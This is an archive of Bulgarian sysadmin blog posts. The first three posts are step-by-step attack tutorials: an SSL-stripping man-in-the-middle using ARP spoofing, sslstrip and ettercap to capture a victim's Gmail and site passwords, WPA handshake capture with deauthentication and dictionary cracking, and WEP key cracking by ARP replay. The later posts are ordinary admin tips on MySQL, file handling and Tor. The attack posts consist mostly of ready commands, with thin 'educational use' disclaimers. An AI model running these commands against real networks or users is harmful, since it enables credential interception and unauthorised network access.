Category Archives: sadmin

sadmin

SSL Hijacking- Видео демонстрация

Здравейте отново от мен Мартин Петров и както винаги тази видео демонстрация е създадена с учебна цел. Авторът не носи отговорност за потенциални щети нанесени от демонстрацията.

Сега ще ви демонстрирам как можете да подслушвате SSL връзки или SSL Hijachking чрез sslstrip от Moxie Marlinspike.

Преди всичко трябва да сканираме своята мрежа и да си изберем потребител на които ще подслушваме SSL връзката.
Отваряме терминал едно и сканираме нашата мрежа

Избираме потребител с IP адрес 192.168.1.100

Сега ще се подготвим за нашият SSL Hijacking като отварим терминал 1 и  редактираме /etc/etter.conf

Позволяваме форвардинг
echo 1 > /proc/sys/net/ipv4/ip_forward

Сега пренасочваме порт 80 към 10 000 с iptables

iptables -t nat -A PREROUTNIG -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

Сега изпълняваме arp спуфинг

arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

В терминал две стартираме sslstrip с аргумент -a -k -f

sslstrip -a -k -f

И в терминал 3 стартираме ettercap за да видим резултата от всичко това :)

ettercap -T -q -i eth0

Хайде сега да наблюдаваме машината на потребителя

Сега потребителят ще отвори сайт с криптирана връзка HTTPS. Например gmail: https://mail.google.com

Въвежда примерно потребителско име и парола

Ще погледнем ettercap в нашата машина. Виждаме потребителското име и паролата които потребителя  въведе по- рано. Всичко се вижда в чист текст като се има впредвид, че връзката беше реализирана чрез https.

По същия начин могат да се прослушват и нормални връзки към страници работещи на 80-ти порт.

Сега потребителя ще отвори уеб сайта arenabg.com и ще въведе примерно потребителско име и парола
Отново виждаме потребителското име и парола.

Видео демонстрация SSL Hijacking:

1. Видео демонстрация качена във vbox
2. Видео демонстрация качена във youtube

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Разбиване на Wireless с WPA encoding

Здравейте отново с мен Мартин Петров. Предния път ви демонстрирах как се разбива Wireless с WEP, а сега ще ви обясня как се разбива Wireless с WPA/PSK.

За целта ще използваме live дистрибуцията BackTrack 4 и приложенията в нея .

След като сме заредили нашият BackTrack ще отворим терминал за да подготвим нашият мрежови интерфейс за работа в режим мониторинг

# iwconfig wlan0 mode monitoring

След като настроихме мрежовият ни интерфейс сега ще сканираме за wireless мрежа която да компрометираме с учебна цел

# airodump-ng wlan0

Понеже търсим wireless със WPA кодиране,а тук виждаме такъв прекратяваме с Контрол и C. Wireless мрежата която ще използваме ще бъде "mpetrov_net" на шести канал.

След като избрахме коя мрежа да използваме и видяхме, че тя работи на шести канал е време да пуснем в Терминал 2 airodump за да събирем информация за съответната мрежа.

# airodump-ng -w wpa -c 6 --bssid 00:23:CD:D7:84:FC wlan0

Сега ще отворим Терминал 3 за да изпратим пакети за ре- оторизация. Ще трябва да използваме MAC адреса на клиента които можем да вземем от Терминал 1.

# aireplay-ng -0 1 -a 00:23:CD:D7:84:FC -c 00:1A:73:87:B4:E9 wlan0

След това ще погледнем Терминал 2 и ще видим горе в дясно WPA handshake: 00:23:CD:D7:84:FC с което приключваме събирането на пакети и пристъпваме към кракване на паролата.

За кракване на паролата ще използваме два метода единият е, чрез aircrack, а другият , чрез cowpatty

Първо ще реализираме кракване с aircrack

cd /pentest/wireless/aircrack-g/test
aircrack-ng -w password.lst /root/wpa-01.cap

Сега ще направим кракване с cowpatty:

cd /pentest/wireless/cowpatty
./cowpatty -r /root/wpa-01.cap -f dict -s mpetrov_net

И двата метода успяват да кракнат паролата и да я изведат.

Видео демонстрация от youtube.com: Разбиване на Wireless с WPA encoding (youtube)
Видео демонстрация от vbox7.com:
Разбиване на Wireless с WPA encoding (vbox7)
Надявам се, че този видео материал ще бъде използван и интерпретиран единствено с учебна цел.

До скоро от mpetrov.net

PS: Това е истината-> EPRB

Според нашия Наказателен Кодекс манипулирането на wireless мрежи е незаконно:

Чл. 212а. (Нов -- ДВ, бр. 92 от 2002 г.) (1) (Изм. -- ДВ, бр. 38 от 2007 г.) Който с цел да набави за себе си или за другиго облага възбуди или поддържа заблуждение у някого, като внесе, измени, изтрие или заличи компютърни данни или използва чужд електронен подпис и с това причини на него или на другиго вреда, се наказва за компютърна измама с лишаване от свобода от една до шест години и глоба до шест хиляди лева.
(2) (Изм. -- ДВ, бр. 38 от 2007 г.) Същото наказание се налага и на този, който, без да има право, внесе, измени, изтрие или заличи компютърни данни, за да получи нещо, което не му се следва.

Вместо да правите такива гимнастики проосто си платете интернета и ще го имате винаги.

VN:F [1.9.22_1171]
Rating: 5.0/5 (5 votes cast)
VN:F [1.9.22_1171]
Rating: +3 (from 3 votes)

Разбиване на Wireless с WEP encoding

Тук ще демонстрирам как се декодира ключ от wireless мрежа с кодиране WEP. Правя този видео материал защото много отдавна очаквах някои да сподели тази демонстрация в нашето българско интернет пространство, но уви никои не го направи.

Тук ще опиша как можем да вземем ключа на wireless мрежа с WEP кодиране.

За целта ще използваме live дистрибуцията BackTrack 4 и приложенията в нея ifconfig,iwconfig,airodump, aireplay и aircrack.

След като сме заредили нашият BackTrack ще отворим терминал за да подготвим нашият мрежови интерфейс за работа в режим мониторинг

# iwconfig wlan0 mode monitoring;

След като настроихме мрежовият ни интерфейс сега ще сканираме за wireless мрежа която да компрометираме с учебна цел

# airodump-ng wlan0

Понеже търсим wireless със WEP кодиране,а тук виждаме такъв прекратяваме с Контрол и C. Wireless мрежата която ще използваме ще бъде "mpetrov_net" на шести канал.

След като избрахме коя мрежа да използваме и видяхме, че тя работи на шести канал е време да пуснем airodump за да събирем информация за съответната мрежа.

# airodump-ng -w wep -c 6 --bssid 00:23:CD:D7:84:FC wlan0 (postoqnno raboti)

Сега ще отворим още един терминал в които ще използваме ARP Reply attack за да увеличим броя на дейта пакетите и да вземем инициализиращите вектори или IV на избраният по- рано Access Point.

# aireplay-ng -3 -b 00:23:CD:D7:84:FC wlan0

Оставяме aireplay пуснат и наблюдаваме Терминал 1. За да имаме успеваемост на разбиване на ключа е необходимо да съберем над 20 000 дейта пакети, след което ще прекратим airodump-ng и aireplay-ng.

След като събрахме над 22 000 дейта пакети прекратяваме airodump с Контрол и C и aireplay с Контрол и C

Сега имаме всичко необходимо за да декодираме ключа на wireless мрежата "mpetrov_net" като използваме aircrack за целта.

aircrack-ng wep-03.cap

Тук виждаме, че ключът е 9781238761 и е кракнат със 100% успеваемост.

Надявам се, че този видео материал ще бъде използван и интерпретиран единствено с учебна цел.

Видео материал във vbox7.com: Разбиване на Wireless с encoding Wep
Видео материал във youtube.com: Разбиване на Wireless с encoding Wep

Според нашия Наказателен Кодекс манипулирането на wireless мрежи е незаконно:

Чл. 212а. (Нов -- ДВ, бр. 92 от 2002 г.) (1) (Изм. -- ДВ, бр. 38 от 2007 г.) Който с цел да набави за себе си или за другиго облага възбуди или поддържа заблуждение у някого, като внесе, измени, изтрие или заличи компютърни данни или използва чужд електронен подпис и с това причини на него или на другиго вреда, се наказва за компютърна измама с лишаване от свобода от една до шест години и глоба до шест хиляди лева.
(2) (Изм. -- ДВ, бр. 38 от 2007 г.) Същото наказание се налага и на този, който, без да има право, внесе, измени, изтрие или заличи компютърни данни, за да получи нещо, което не му се следва.

Вместо да правите такива гимнастики проосто си платете интернета и ще го имате винаги.

VN:F [1.9.22_1171]
Rating: 5.0/5 (3 votes cast)
VN:F [1.9.22_1171]
Rating: +2 (from 2 votes)

Linux модул за TP-LINK TL-WN321G

Идеята на този пост е да обясни на начинаещите как да ползват своя wireless usb tplink wn321g под Linux. Модула за TP-LINK TL-WN321G е : rt73usb

За да го заредите изпълнете: modprobe rt73usb

За да видите дали е зареден правилно се изпълнява: iwconfig :)

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Как да възстановим своята root парола за MySQL

Ако на някои му се случи да си забрави root паролата за MySQL да изпълни следните стъпки и тя ще бъде нулирана(или въведена нова такава):

#Това убива стартирания mysqld(най- добре е да го спрете нормално,но  ако не можете просто го килнете както е по- долу)
killall -9 mysqld_safe && killall -9 mysqld;

#Стартираме го без права
mysqld_safe --skip-grant-tables --old-passwords &

#Сетваме нулева парола за root
mysql -uroot -e "UPDATE mysql.user SET Password=PASSWORD(") WHERE User='root'";

Това е всичко от мен приятели (rofl) :)

PS: Има и друг вариант с mysql-init : mysqld_safe --init-file=mysql-init &

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Архивиране и изтриване на файл с тире в GNU/Linux

На всеки би трябвало да му се е случвало да трябва да изтирва под GNU/Linux файлове започващи със "--".  Не можете обаче просто да си го мачнете и изтриете по нормалния начин "rm -fr --biba"

Решение: rm -fr ./--biba

Предполагам някои е искал да архивира със zip някой файл започващ със тире(-) и да не е успявал. т.е.

zip -r -example.zip -example.doc;

Извежда следната грешка: zip error: Invalid command arguments (no such option: -)

Решението е(като при изтриването):

zip -r ./-example.zip ./-example.doc;

PS: Всеки нормално занимаваш се с GNU/Linux трябва да се е сблъсквал с това и да го знае още в първия месец, но за тези които не знаят или не са се сблъсквали с този проблем този пост е именно за тях.

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Рекурсивно преименуване на файлове в GNU/Linux

Наложи ми се да конвертирам всички *.SH файлове в *.sh но тези файлове са в куп директории и под директории. Веднага ми доиде на ум как да го направя с find , но реших да гугълна да видя дали има по- рационално решение. Е не видях такова. Видях решения от рода на цикли с bash, perl и какво ли не, но решение с "one line" не видях.

Ето го моето решение:

find $PWD -name "*.SH" -exec rename 'y/.SH/.sh/' "{}" \;

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Как да копираме това което ни е необходимо:) (cp GNU/Linux)

Във връзка с една предишна публикация за  "Как да намеря това което търся и това което НЕ търся (Find в GNU/Linux)" ми се наложи подобно нещо, но да копирам конкретни папки от една папка с много папки  такива(повечето са тези които ми трябват).

Ще разгледам конкретен случай в които имаме следните директории:

0папка1
0папка2
3папка3
4папка4
5папка5
6папка6
7папка7
8папка8

Аз искам да копирам всички папки с изключение на тези които започват с "0"(нула). Задачката-играчката има няколко решения:

1. Преместваме всичките 0*папка* на друго място и копираме всички останали папки * като след това връщаме папките с 0папка*.- Не рационално.

2. Копираме желаните папки като аргументи. Пример: cp 3папка3 4папка4 5папка5 … и т.н. -- Не рационално.

Ето го моето решение:

cp -Rvp [!0*]* destination_dir

Това ще копира всички папки с изключение на тези които започват с "0" (нула).- Рационален

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Инсталиране на TOR == Анонимност в Интернет

torВ тази публикация ще опиша с няколко стъпки как  се инсталира, конфигурира и ползва Tor в GNU/Linux- Debian. Идеята е криптиране на връзката която ползвате или да имате по- добра анонимност в Интернет. Приложението е възможно освен за GNU/Linux така и за MS Windows и OS X и BSD.

Статията е за напълно начинаещи с напълно основни познания по всичко :)(Просто се изпълнява подред и това е :) )

1. Редактиране на файл: /etc/apt/sources.list :
#За Etch
deb     http://deb.torproject.org/torproject.org etch main
#За Lenny
deb     http://deb.torproject.org/torproject.org lenny main
#и т.н.

2. Инсталиране на sudo
apt-get install sudo

3. Зареждане на ключове:

gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add --

4. Ъпдейтване и инсталиране на tor

apt-get update && apt-get install tor tor-geoipdb privoxy

5. Редактиране на конф. файл на provixy (/etc/privoxy/config)
Добавете това(по този начин пренасочваме tor порта към 8118:

#added by amri
forward-socks4a / localhost:9050 .

6. Рестартиране на tor и privoxy
/etc/init.d/tor restart;
/etc/init.d/privoxy restart;

7. Тестване за анонимност

7.1 Тест, чрез links
links -http-proxy 127.0.0.1:8118 http://check.torproject.org/

7.2  Тест, чрез lynx
export http_proxy="http://127.0.0.1:8118";
lynx http://check.torproject.org/;

#Бележка: Когато сетвате http_proxy това важи и за apt т.е. ако искате да инсталирате нещо през apt-get ще минете през това прокси. За да го премахнете премахнете променливата или: export http_proxy="

PS: За Firefox е повече от ясно как се въвежда всичко :)

VN:F [1.9.22_1171]
Rating: 5.0/5 (2 votes cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Прост Bash скрипт за създаване на mysql потребител и база

Ето едно просто скриптче което ще ви помогне лесно да създавате лесно MySQL потребител с неговата парола и едновременно създаване на база.

#!/bin/sh
mysqlpassword=$2;
mysqluser=$1;
mysqldb=$3;

if [ $# -eq 3 ]
then

echo "Create Database $mysqldb";
mysql -e "CREATE DATABASE $mysqldb" -p;
echo "Create user $mysqluser -- GranT all on db:$mysqldb";
mysql -e "GRANT ALL ON $mysqldb.* TO $mysqluser@localhost IDENTIFIED BY '$mysqlpassword' WITH GRANT OPTION;" -p
echo "Flush Privileges";
mysql -e "FLUSH PRIVILEGES;" -p;
echo "Create Table fsearch";
exit;
fi;
echo "$0 mysqluser mysqlpass mysqlDB";

Пример за ползване:
sh mysql_create_user.sh mysql_user mysql_pass mysql_db

PS: Потребителят които се създава има пълни права в/у базата

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)